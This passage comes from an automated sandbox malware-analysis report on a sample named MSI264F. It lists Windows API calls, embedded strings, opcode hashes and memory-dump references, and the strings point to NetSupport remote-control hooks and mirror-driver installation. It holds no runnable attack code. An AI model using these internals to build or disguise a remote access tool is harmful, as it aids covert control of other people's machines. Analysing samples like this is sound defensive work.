                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Item$Window$ShowText$MessageSend$Enable$DialogLoadStringwsprintf
                                                                                                                        • String ID: %02d-%s-%d
                                                                                                                        • API String ID: 1251551559-2248033597
                                                                                                                        • Opcode ID: 82cd1c06b826f940c6b1c82291db2e6f29865f08bafd0d2634b2286e688ded05
                                                                                                                        • Instruction ID: 16d930ca559728c24b43e69606287428a4afd4773dae7bba8b44eeafa985ae0f
                                                                                                                        • Opcode Fuzzy Hash: 82cd1c06b826f940c6b1c82291db2e6f29865f08bafd0d2634b2286e688ded05
                                                                                                                        • Instruction Fuzzy Hash: FC8105B17817247FEA216B60AC4AFAF36ACEF85B00F404055F3056B0D1CEF85A41CA6A
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Pixel$Line$Move$Object$Select$CreateDelete
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3848591802-0
                                                                                                                        • Opcode ID: b91af70bd5d105304b652a49c59a6ee08054ec1903d0dd4a1e51e6d65c86a1de
                                                                                                                        • Instruction ID: cc32fbc9013756e3592a0be7892d4df3273ff8b085bbdb9259275f270b9f83d7
                                                                                                                        • Opcode Fuzzy Hash: b91af70bd5d105304b652a49c59a6ee08054ec1903d0dd4a1e51e6d65c86a1de
                                                                                                                        • Instruction Fuzzy Hash: 54D1C2B4610501BFE728DF68CD98D7BB7FDEBC9B10B10850DF996A3784CA74AC418A20
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B14DA4
                                                                                                                        • _memset.LIBCMT ref: 00B14DB7
                                                                                                                        • wsprintfW.USER32 ref: 00B14DED
                                                                                                                        • _strrchr.LIBCMT ref: 00B14E31
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B14E57
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00B14E61
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 00B14E83
                                                                                                                        • wsprintfW.USER32 ref: 00B14E92
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?), ref: 00B14EB8
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00B14EC2
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?), ref: 00B14EE4
                                                                                                                        • wsprintfW.USER32 ref: 00B14F2C
                                                                                                                        • wsprintfW.USER32 ref: 00B14F39
                                                                                                                        • wsprintfW.USER32 ref: 00B14F47
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B14F94
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00B14F9E
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 00B14FC0
                                                                                                                        • wsprintfW.USER32 ref: 00B14FD9
                                                                                                                        • wsprintfW.USER32 ref: 00B14FEE
                                                                                                                        • _strrchr.LIBCMT ref: 00B15051
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 00B15077
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00B15081
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,?,?,?), ref: 00B150A3
                                                                                                                        • wsprintfW.USER32 ref: 00B150B9
                                                                                                                        • wsprintfW.USER32 ref: 00B150D2
                                                                                                                        • wsprintfW.USER32 ref: 00B150DF
                                                                                                                        • wsprintfW.USER32 ref: 00B150ED
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$ByteCharMultiWide$__alloca_probe_16$_memset_strrchr
                                                                                                                        • String ID: (%d.%02d.%d.%d)$ + %d bytes$%p $%s + %d bytes$, %s, Line %d$<unknown module>$<unknown symbol>
                                                                                                                        • API String ID: 3451700745-3267890874
                                                                                                                        • Opcode ID: 5d3632474707647fb781c3f13c5f95aec72b35dc12192ddad21694cc931f8dca
                                                                                                                        • Instruction ID: 58a554c0d391746c8b6654859e3f0c35281e65b2898e735b89d8fc42732bf4c4
                                                                                                                        • Opcode Fuzzy Hash: 5d3632474707647fb781c3f13c5f95aec72b35dc12192ddad21694cc931f8dca
                                                                                                                        • Instruction Fuzzy Hash: 6AA12E71A00329ABDB25DB648C41FAAB3FCFB48704F5442D8B518A72D0DA75AF81CF94
                                                                                                                        APIs
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00AFEFE9
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00AFF0CD
                                                                                                                          • Part of subcall function 00AFFF40: GetModuleHandleW.KERNEL32(kernel32.dll,ProcessIdToSessionId,?,00000000), ref: 00AFFF66
                                                                                                                          • Part of subcall function 00AFFF40: GetProcAddress.KERNEL32(00000000), ref: 00AFFF6D
                                                                                                                          • Part of subcall function 00AFFF40: GetCurrentProcessId.KERNEL32(00000000), ref: 00AFFF83
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory$AddressHandleModuleProcProcessSystem
                                                                                                                        • String ID: Try again after removing the 'Block Unsigned Driver Policy'$DISPLAY$InstallGdihook5 ret %d$New mirror installation, e=%d$Unloadable mirror detected - update on reboot$Updategdihook5 err=x%x$Updategdihook5 ok$\gdihook5.dll$copy %s to %s failed$copy %s to %s ok$gdihook5 (e2=%d)$gdihook5.dll$gdihook5.inf$mirror already installed$pci_gdihook5_hwid$rename %s to %s on reboot failed$rename %s to %s on reboot ok$using .inf=%s
                                                                                                                        • API String ID: 814484115-2657261969
                                                                                                                        • Opcode ID: f483bf61835cb0997a46ba8a525439a050db40b235d56439fe0aa28b06c37b1b
                                                                                                                        • Instruction ID: fc55e51b56c3167da8bb57e967dcbd0e40355e120435547f06e214929456895a
                                                                                                                        • Opcode Fuzzy Hash: f483bf61835cb0997a46ba8a525439a050db40b235d56439fe0aa28b06c37b1b
                                                                                                                        • Instruction Fuzzy Hash: 8CD17071D0121D9EEB209FA49C81FBAB3B4AF44704F1046F9FA09A6291EF745E84CF55
                                                                                                                        APIs
                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00B00725
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: PathTemp
                                                                                                                        • String ID: Call Stack:%s$Details in file:$...(more)$Callstack:$ $%04d-%02d-%02d %02d:%02d:%02d.%03d, Win%s %d.%d$NOT copied to disk$Support\$copied to %s
                                                                                                                        • API String ID: 2920410445-1214151659
                                                                                                                        • Opcode ID: ed621af296d9e36cb0069df42f90b745790fbc054f2f606ecfaad93453f117ae
                                                                                                                        • Instruction ID: b08fc3293e357b47ec16a0380a796d936996c6638af5b63ca27bf4b0c0ba1ecf
                                                                                                                        • Opcode Fuzzy Hash: ed621af296d9e36cb0069df42f90b745790fbc054f2f606ecfaad93453f117ae
                                                                                                                        • Instruction Fuzzy Hash: 98D1F471A102199BCB34EB64CD51BEA77F9EF94300F0481E5EA0A972D1FBB55E84CB90
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(psapi.dll,5E06C67B,?,?,?,?,00B6747B,000000FF), ref: 00B2D130
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00B2D1CB
                                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00B2D249
                                                                                                                        • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00B2D274
                                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00B2D2F0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$LibraryLoadOpenProcess
                                                                                                                        • String ID: %s has %s$.dll$.exe$C:\Windows\Installer\$EnumProcessModules$EnumProcesses$GetModuleFileNameExW$psapi.dll$shfolder.dll
                                                                                                                        • API String ID: 2120802357-3786208033
                                                                                                                        • Opcode ID: 3ddf6cdad18c298e53cfe223b0c2dc2f602826701781d669e8ff4fd6e018292c
                                                                                                                        • Instruction ID: 447d037d35fdd8f13c10632c2940be677a6fb1d202815a7b46d1880f37090c5b
                                                                                                                        • Opcode Fuzzy Hash: 3ddf6cdad18c298e53cfe223b0c2dc2f602826701781d669e8ff4fd6e018292c
                                                                                                                        • Instruction Fuzzy Hash: 1AC181719002249BDB20EF68DC85BEA77F8FF58300F5485E9E58DA7250DB74AE81CB54
                                                                                                                        APIs
                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064), ref: 00AFCBAC
                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,?), ref: 00AFCBCF
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AFCBDA
                                                                                                                        • ResetEvent.KERNEL32(?), ref: 00AFCBEF
                                                                                                                        • ResetEvent.KERNEL32(?), ref: 00AFCBF5
                                                                                                                        • SetEvent.KERNEL32(?), ref: 00AFCBFB
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 00AFCC31
                                                                                                                        • SetEvent.KERNEL32(?), ref: 00AFCC5D
                                                                                                                        • ResetEvent.KERNEL32(?), ref: 00AFCC67
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 00AFCCC8
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00AFCD04
                                                                                                                        • wsprintfW.USER32 ref: 00AFCD7A
                                                                                                                        • _memmove.LIBCMT ref: 00AFCDA8
                                                                                                                        • SetEvent.KERNEL32(FFFFCFC7), ref: 00AFCDBA
                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064), ref: 00AFCE02
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Event$Wait$Reset$MultipleObjectObjectsProcessSingle$CloseCurrentHandleOpen_memmovewsprintf
                                                                                                                        • String ID: ..\CTL32\ipc.cpp$cbdata=%d, datalen-sizeof=%d$deadshare$iffy result$no error$senderror$timeout
                                                                                                                        • API String ID: 2524104981-3727536503
                                                                                                                        • Opcode ID: e0e840d29091ea50f3efb504c472381e758cde23ef32e90c11ff84bf3e6efd4b
                                                                                                                        • Instruction ID: 8cc4b53a5c2f7e389da0a8b31c13fac1f66d745a958d914d766ee83b41e6b749
                                                                                                                        • Opcode Fuzzy Hash: e0e840d29091ea50f3efb504c472381e758cde23ef32e90c11ff84bf3e6efd4b
                                                                                                                        • Instruction Fuzzy Hash: 06C16B756007089FD724DF65D984B6AB7E5FF88320F10865EEA4A87791CB74E881CF90
                                                                                                                        APIs
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B060DE
                                                                                                                        • GetStockObject.GDI32(0000000F), ref: 00B060F2
                                                                                                                        • GetDC.USER32(00000000), ref: 00B06174
                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 00B06185
                                                                                                                        • RealizePalette.GDI32(00000000), ref: 00B0618B
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 00B061A6
                                                                                                                        • SelectPalette.GDI32(00000000,?,00000001), ref: 00B061BA
                                                                                                                        • RealizePalette.GDI32(00000000), ref: 00B061BD
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B061C5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
                                                                                                                        • String ID: (
                                                                                                                        • API String ID: 1969595663-3887548279
                                                                                                                        • Opcode ID: ec1376b8a6e928d500c093404c2097350367f60cbde0cd6a2f17a5875948ef12
                                                                                                                        • Instruction ID: 96d3fcc6bc7789e7d8875007000b821907598ae79c922bd4895861bbff678aee
                                                                                                                        • Opcode Fuzzy Hash: ec1376b8a6e928d500c093404c2097350367f60cbde0cd6a2f17a5875948ef12
                                                                                                                        • Instruction Fuzzy Hash: 2D716FB1A00218ABDB10DFA4DC89BEEBBFDFF49711F144159F501E7290DBB899418BA0
                                                                                                                        APIs
                                                                                                                        • GetWindowTextW.USER32(?,?,000000F0), ref: 00B28F4C
                                                                                                                        • wsprintfW.USER32 ref: 00B28F6D
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00B28FB7
                                                                                                                        • GetDlgItemTextW.USER32(?,0000041C,?,000000F0), ref: 00B28FD5
                                                                                                                        • wsprintfW.USER32 ref: 00B28FEF
                                                                                                                        • SetDlgItemTextW.USER32(?,0000041C,?), ref: 00B2903C
                                                                                                                        • GetDlgItemTextW.USER32(?,0000041D,?,000000F0), ref: 00B29054
                                                                                                                        • wsprintfW.USER32 ref: 00B29091
                                                                                                                        • SetDlgItemTextW.USER32(?,0000041D,?), ref: 00B290DE
                                                                                                                        • GetDlgItemTextW.USER32(?,0000041E,?,000000F0), ref: 00B29100
                                                                                                                        • wsprintfW.USER32 ref: 00B2911B
                                                                                                                        • SetDlgItemTextW.USER32(?,0000041E,?), ref: 00B2916C
                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00B2917D
                                                                                                                        • EnableWindow.USER32(00000000), ref: 00B29180
                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00B2918B
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2918E
                                                                                                                        • GetDlgItem.USER32(?,00000006), ref: 00B291B0
                                                                                                                        • EnableWindow.USER32(00000000), ref: 00B291B9
                                                                                                                        • GetDlgItem.USER32(?,00000006), ref: 00B291C0
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B291C9
                                                                                                                        • GetDlgItem.USER32(?,00000007), ref: 00B291D6
                                                                                                                        • EnableWindow.USER32(00000000), ref: 00B291D9
                                                                                                                        • GetDlgItem.USER32(?,00000007), ref: 00B291E6
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B291E9
                                                                                                                        • GetDlgItem.USER32(?,0000041E), ref: 00B291F9
                                                                                                                        • EnableWindow.USER32(00000000), ref: 00B291FC
                                                                                                                        • GetDlgItem.USER32(?,0000041E), ref: 00B2920C
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2920F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Item$Window$Text$EnableShowwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1904402394-0
                                                                                                                        • Opcode ID: 73d0ace09851024920a94e336319f63201ff2c2faa6428922fe710b0d4aaa878
                                                                                                                        • Instruction ID: ae1fb95c21352df4015b69a50c350448ad71842d24513a7e1d2b20bef7e71b82
                                                                                                                        • Opcode Fuzzy Hash: 73d0ace09851024920a94e336319f63201ff2c2faa6428922fe710b0d4aaa878
                                                                                                                        • Instruction Fuzzy Hash: 5081B2B1E4022BAADB24AB60DD45FFB77BDEB24710F0005A5E60DA71C1EB75DA41CB60
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(?), ref: 00B308FE
                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000F), ref: 00B3091A
                                                                                                                        • FindWindowExW.USER32(00000000,00000000,Shell_TrayWnd,00000000), ref: 00B30934
                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 00B30941
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00B30954
                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00B30959
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000032), ref: 00B3096A
                                                                                                                        • ResetEvent.KERNEL32(?), ref: 00B30978
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00B30993
                                                                                                                        • GetProcAddress.KERNEL32(?,MyUnhook), ref: 00B309C5
                                                                                                                        • GetDesktopWindow.USER32 ref: 00B309EC
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 00B30A00
                                                                                                                        • OpenProcess.KERNEL32(00000600,00000000,?), ref: 00B30A19
                                                                                                                        • OpenProcess.KERNEL32(00000200,00000000,?), ref: 00B30A2E
                                                                                                                        • GetPriorityClass.KERNEL32(00000000), ref: 00B30A37
                                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00B30A4C
                                                                                                                        • GetDesktopWindow.USER32 ref: 00B30A58
                                                                                                                        • SendMessageW.USER32(00000000), ref: 00B30A5F
                                                                                                                        • Sleep.KERNEL32(000000FA,80000002,Software\NetSupport Ltd\winsthooks,00020219), ref: 00B30AAC
                                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000000), ref: 00B30AB8
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B30ABF
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B30ADD
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B30AEA
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B30AF3
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00B30B10
                                                                                                                          • Part of subcall function 00AE9770: FindWindowExW.USER32(00000000,00000000,Windows.UI.Core.CoreWindow,00000000), ref: 00AE9791
                                                                                                                          • Part of subcall function 00AE9770: GetWindowLongW.USER32(00000000,000000F0), ref: 00AE97A4
                                                                                                                          • Part of subcall function 00AE9770: DwmGetWindowAttribute.DWMAPI(00000000,0000000E,?,00000004), ref: 00AE97C2
                                                                                                                          • Part of subcall function 00AE9770: FindWindowExW.USER32(00000000,00000000,Windows.UI.Core.CoreWindow,00000000), ref: 00AE9839
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CloseHandle$ClassFindObjectPriorityProcessSingleWait$DesktopLongOpenShow$AddressAttributeEventFreeLibraryMessageProcResetSendSleepThread
                                                                                                                        • String ID: MyUnhook$Software\NetSupport Ltd\winsthooks$Unhooking$UnloadDelay$Unloading %s
                                                                                                                        • API String ID: 3586307839-2527058001
                                                                                                                        • Opcode ID: 062ad435d50dc9b0224d7b62308e6ec18e4ec70e822c70edefd58e8146510abe
                                                                                                                        • Instruction ID: 1ed2f6b22881ee5510eb1b96d29a6445bbbdc4fdbf43dca151cf269ca9d63426
                                                                                                                        • Opcode Fuzzy Hash: 062ad435d50dc9b0224d7b62308e6ec18e4ec70e822c70edefd58e8146510abe
                                                                                                                        • Instruction Fuzzy Hash: 0341D371A10715AFDB30AB60DC98BAE73ACEF44701F1000D8E609A32D2DEB49D84CF55
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00B3D3F0), ref: 00B42D56
                                                                                                                        • __mtterm.LIBCMT ref: 00B42D62
                                                                                                                          • Part of subcall function 00B42A21: DecodePointer.KERNEL32(00000006,00B42EC4,?,00B3D3F0), ref: 00B42A32
                                                                                                                          • Part of subcall function 00B42A21: TlsFree.KERNEL32(00000016,00B42EC4,?,00B3D3F0), ref: 00B42A4C
                                                                                                                          • Part of subcall function 00B42A21: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,00B42EC4,?,00B3D3F0), ref: 00B491BF
                                                                                                                          • Part of subcall function 00B42A21: _free.LIBCMT ref: 00B491C2
                                                                                                                          • Part of subcall function 00B42A21: DeleteCriticalSection.KERNEL32(00000016,76EF5810,?,00B42EC4,?,00B3D3F0), ref: 00B491E9
                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B42D78
                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B42D85
                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B42D92
                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B42D9F
                                                                                                                        • TlsAlloc.KERNEL32(?,00B3D3F0), ref: 00B42DEF
                                                                                                                        • TlsSetValue.KERNEL32(00000000,?,00B3D3F0), ref: 00B42E0A
                                                                                                                        • __init_pointers.LIBCMT ref: 00B42E14
                                                                                                                        • EncodePointer.KERNEL32(?,00B3D3F0), ref: 00B42E25
                                                                                                                        • EncodePointer.KERNEL32(?,00B3D3F0), ref: 00B42E32
                                                                                                                        • EncodePointer.KERNEL32(?,00B3D3F0), ref: 00B42E3F
                                                                                                                        • EncodePointer.KERNEL32(?,00B3D3F0), ref: 00B42E4C
                                                                                                                        • DecodePointer.KERNEL32(Function_00062BA5,?,00B3D3F0), ref: 00B42E6D
                                                                                                                        • __calloc_crt.LIBCMT ref: 00B42E82
                                                                                                                        • DecodePointer.KERNEL32(00000000,?,00B3D3F0), ref: 00B42E9C
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B42EAE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
